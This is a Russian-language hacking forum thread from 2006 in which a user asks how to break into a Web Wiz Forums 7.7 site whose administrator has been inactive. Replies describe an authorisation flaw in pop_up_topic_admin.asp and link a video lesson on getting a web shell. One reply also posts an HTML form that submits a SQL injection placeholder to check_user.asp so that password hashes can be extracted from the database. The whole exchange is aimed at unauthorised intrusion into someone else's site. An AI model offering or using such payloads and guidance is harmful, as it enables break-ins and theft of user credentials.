Форумы Есть ли уязвимости в Web Wiz Forums version 7.7

Discussion in 'Уязвимости CMS/форумов' started by banall, 11 Jul 2006.

  1. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    В этой версии форума
    Powered by Web Wiz Forums version 7.7
    в первый раз сталкиваюсь с данным форумом, может кто подскажет как ломануть, только не XSS админ не появлялся 1.5 года.
     
    1 person likes this.
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Да есть!!:)
    В них есть SQL инъекция потому что сценарий pop_up_topic_admin.asp не проверяет разрешения доступа при обновлении параметров темы.
    Поэтому удаленный атакующий может неавторизованно выполнять административные операции над темой форума.
     
  3. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    И все, а как на счет веб шелла, через скуль инекцию никак?
     
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Бляяяя....
    Вот тебе линк на видео урок.
    http://video.antichat.org/file134.html
     
  5. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    а толку то, ведь админы уже больше года не появляются.
     
  6. j0nathan

    j0nathan Elder - Старейшина

    Joined:
    13 Jul 2006
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    не хочешь иксСС на скуль

    Code:
    <html>
    < form method="POST" action="[COLOR=Red]http://target/[product][/COLOR]/check_user.asp">
    < input type="hidden" name="txtUserName" value="[SQL INJECTION]">
    < input type="hidden" name="txtUserPass" value="1">
    < input type="submit" value="Submit" name="submit">
    < /form></html> 
    Сиди вытигивай хэш из БД !! Удачи ;)
     
  7. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    спасибо большое!!!!